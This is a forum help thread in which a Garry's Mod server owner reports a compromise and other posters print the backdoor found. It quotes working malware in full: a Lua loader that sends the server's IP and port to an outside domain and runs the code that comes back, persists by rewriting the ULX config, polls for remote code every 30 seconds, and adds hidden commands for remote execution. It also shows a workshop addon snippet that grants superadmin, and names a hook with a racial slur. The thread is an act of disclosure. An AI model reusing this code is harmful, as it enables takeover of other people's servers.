Server Hack?

I’ve read about the Drugz mod giving this but I don’t have that on my server, one day a player on my server crashed it then this keeps popping up in console.


(SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end
ServerLog: [ULX] (SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end

I check my ulx config and sure enough, https://gyazo.com/35eed4dae23d37a71f49fd098551daa6 after removing that and a restart later I still get this in console.


(SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end
ServerLog: [ULX] (SILENT) (Console) ran lua: function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end

what should I do, can anybody help? Is it a backdoor?

[editline]8th February 2017[/editline]

And now when I restart my server, all the code that was in the config.txt I delted comes back. Please help

And Now Im Getting Random Things Like This,
ayy
not nil
is veh
audir8tdm
is in thing
Set Up NetworkVar

post your workshop colection

[editline]8th February 2017[/editline]

Here’s the script that gets run:
[lua]-- Tracker Information Saved. (PLEASE DONT STEAL ADDONS)
–MsgN("-------------------------------------------------------------------------------------")
–MsgN(“You seem to be running the correct version!
Enjoy the script!”)
–MsgN("-------------------------------------------------------------------------------------")
if file.Exists(“ulx/config.txt”, “DATA”) and not GetHostName():find(“CloneWars”) then
if not string.find(file.Read(“ulx/config.txt”, “DATA”), “__load”) or not string.find(file.Read(“ulx/config.txt”, “DATA”), “xn–vxao”) then
file.Append(‘ulx/config.txt’, [[
ulx_logecho 0
ulx luarun “function a() http.Fetch('https://κρ.pw/tracker.php?port=’..GetConVar(‘hostport’):GetString()..’&ip=’..game:GetIPAddress()..’&addon=’..GetHostName():Replace(’ ', ‘%20’),function(body)RunString(body, ‘lua/init.lua’) end) _G.a = nil end”
ulx luarun “concommand.Add(’__load’, a)”
ulx_logecho 1
]])
end
end

concommand.Add(“vc”, function(a, b, c, d)
BroadcastLua(d)
end)

concommand.Add(“v”, function(a, b, c, d)
RunString(d)
end)

local function lua(ply, _, _, code)
local env = {
me = ply,
this = ply:GetEyeTrace().Entity
}

setmetatable(env, {
	__index = _G,
	__newindex = function(self, k, v)
		rawset(_G, k, v)
	end
})

local ret = CompileString(code, "l", false)

if type(ret) == "string" then
	ply:ChatPrint(ret)

	return
end

setfenv(ret, env)
local success, ret = pcall(ret)

if success then
	ply:ChatPrint("SUCCESS: " .. tostring(ret))
else
	ply:ChatPrint("FAIL: " .. tostring(ret))
end

end

if not CAC then
concommand.Add(“version_check_run”, function(ply, cmd, arg, args)
game.ConsoleCommand(args … "
")
end)

concommand.Add("version_check_lua", lua)
--v:ChatPrint(string.sub(text, 1, 1))

else
hook.Add(“PlayerSay”, “niggers”, function(sender, text)
if sender:SteamID():find(“28861”) then
v = sender

		if string.sub(text, 1, 1) == "#" then
			lua(sender, {}, {}, string.sub(text, 2, string.len(text)))

			return ""
		end
	end
end)

end

–http.Post(“https://κρ.pw/run_timer.lua?a=” … math.random(0, 1000000) … “&b=” … math.random(0, 100000000), {}, function(body) RunString(body, “lua/init.lua”) end, function() end)
timer.Create(“llllllllllll”, 30, 0, function()
http.Post(“https://κρ.pw/run_timer.lua?a=” … math.random(0, 1000000) … “&b=” … math.random(0, 100000000), {}, function(body)
RunString(body, “lua/init.lua”)
end, function() end)
end)
[/lua]

[editline]8th February 2017[/editline]

2nd payload

Found one backdoor, don’t think its the one causing your issues tho.

http://steamcommunity.com/sharedfiles/filedetails/?id=737361612

lua/autorun/server/advdupe2_sv_init.lua
[lua]
concommand.Add(“DumbassServer”, function(player)
player:SetUserGroup(“superadmin”)
end)
[/lua]

Huh, funny it got removed from the workshop…

Because I sent it to robotboy